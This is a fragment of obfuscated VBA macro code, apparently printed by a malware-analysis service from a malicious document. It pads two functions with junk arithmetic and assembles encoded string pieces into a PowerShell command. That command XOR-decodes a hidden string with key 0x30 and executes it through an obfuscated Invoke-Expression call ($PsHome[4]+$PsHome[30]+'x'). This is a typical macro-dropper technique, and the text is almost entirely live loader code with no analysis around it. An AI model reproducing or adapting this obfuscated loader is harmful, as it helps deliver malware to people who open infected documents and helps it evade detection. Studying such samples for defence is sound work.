wSIfj = Nkhtjd
CuXTW = Tan(71764)
RaLfcl = Tan(27597)
QRRfa = EKRbSj
riVREV = CDbl(iUjltB * CDbl(sIXEzM + Int(jTZVC * Rnd(40852)) * wTwGi * Log(4428 * wqOYPP - vlflZv + Fix(51))))
KwvBA = CDbl(jAjfOz)
QIvAG = "8d85S93P64P1" + "6P27~16A23A108" + "~23S1" + "6~27S16" + "P20J91u8" + "3f120u83u103l16" + "E27"
zTiPb = ipXoIC
zpbST = Tan(81380)
vwZYnI = Tan(32664)
ltTWP = GuBzX
iPkls = CDbl(ZXacCL * CDbl(awnbL + Int(GizLYp * Rnd(16527)) * aHqjt * Log(23850 * rjMnj - jtpIr + Fix(51))))
RrkDL = CDbl(jPzQkw)
fBTRQwml = "J16~23E3" + "0l85f72~85S23f1" + "1J86~95~66J85A" + "81P83A" + "88J24P20f67A71" + "S96" + "u119P92l82" + "E16d89d94f1" + "6A20S104J65E12" + "0E1"
wNMdWb = CwwLE
WCjCrG = Tan(22408)
iJiwoW = Tan(81337)
vMHcAr = njdEMi
fHLrf = CDbl(StDcB * CDbl(NalAbN + Int(WEHbn * Rnd(51801)) * hCnLDq * Log(97556 * dXnzri - BIibW + Fix(51))))
XfYQj = CDbl(PGsZLf)
kNiqws = "24~90E25d75P" + "68A66A7" + "3P7" + "5A20" + "J117u95E6" + "6f12" + "7f101f8" + "6P30J116A95u71" + "J94S92d95P" + "81P84u118A89S9"
WwVXO = KOtaVw
orhsow = Tan(45816)
KADIM = Tan(68043)
WFrPhI = EuQFQq
ZoXYVf = CDbl(BZjML * CDbl(UPDjM + Int(sRqWww * Rnd(26668)) * wIhrvN * Log(56445 * LjkrEi - jIDVs + Fix(51))))
RabHDK = CDbl(rrQzmj)
nUjZqBJrwHm = "2d85f24~20E67J" + "71l96E119u" + "92A82d30u100u" + "95~99A68A" + "66~89E94" + "P87" + "f24E25P28d16" + "u20S115S9" + "6S1" + "23P81u89d92A25u"
kCnVZ = XKRGVcKZwYb + TmoRPU + mdDvhUwH + CUYPmNBw + rHsUj + OjFofcRh + QIvAG + fBTRQwml + kNiqws + nUjZqBJrwHm
End Function
Function ULzbvSo()
On Error Resume Next
HajaQ = CCEUr
tSwzXc = Tan(80532)
QAzHP = Tan(10635)
tGIjA = bpQmX
wkUjW = CDbl(jaYDj * CDbl(lHAcr + Int(JihhKQ * Rnd(80444)) * WvVVzH * Log(5384 * AZvQc - fidqZH + Fix(51))))
OaDtk = CDbl(oFDGZw)
fOUmlSz = "11f99" + "l6" + "8P81u66f68S2" + "9f96~66d95u8" + "3P85E67P67~16" + "d20~11" + "5P96J" + "123l81E89" + "f92J11" + "E82S66l85A81A"
Vmmbc = fPaMFt
Mviirt = Tan(5883)
nccWXZ = Tan(58316)
slzsX = wrZZjA
dmsSX = CDbl(JnVJF * CDbl(LwRMi + Int(julcVa * Rnd(77919)) * YWLcf * Log(69838 * YKqjEA - UZXct + Fix(51))))
XARRd = CDbl(jncsi)
VmLUtaP = "91E" + "11" + "S77S83~81" + "~68E83A88l" + "75u71~66A89d"
LmHRj = ucvPB
amAXF = Tan(69326)
Ircrjl = Tan(72255)
lBJYSa = hhwizY
ZIDCN = CDbl(niLvY * CDbl(UdHvwH + Int(ojlcCJ * Rnd(5478)) * htPavI * Log(97965 * UoiXX - HpNAiG + Fix(51))))
ofBsKN = CDbl(lwUcb)
oQsQBhOCaJ = "68d" + "85~29f88" + "l95J67u68f1" + "6P20" + "S111f30d117" + "E72l83A85u64P6" + "8J89P95A9" + "4f30l125A85f6" + "7f"
vBKfC = BjTWz
VwtnrL = Tan(54510)
wwHHPD = Tan(81557)
Ycomm = KnVst
Gkrni = CDbl(nkpwsQ * CDbl(QOQzih + Int(mDzjw * Rnd(39063)) * WKHGCV * Log(57647 * MFTcj - GjajX + Fix(51))))
DnHoKC = CDbl(Zhrpv)
wBLWOXZzzdD = "67l81" + "E87A85J11A77l" + "77'." + "SpLIt('" + "JES~ludPAf' )" + " |ForEaCh {[" + "cHar]( " + "$_-" + "bXOr'0x30'"
JTZBA = jquTX
kEYoIv = Tan(51748)
jKXRUP = Tan(83088)
sSZziR = wjCjtc
awiIo = CDbl(bFjQI * CDbl(dsuIN + Int(wBddcN * Rnd(1849)) * XDzRnF * Log(96507 * jaiLb - SmjIpQ + Fix(51))))
wUVHDn = CDbl(GRcCP)
GBrZDzChPV = " )} ) |& ( $Ps" + "HoME[4]+$PsHO" + "Me[30]+'x')"
ULzbvSo = fOUmlSz + VmLUtaP + oQsQBhOCaJ + wBLWOXZzzdD + GBrZDzChPV
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.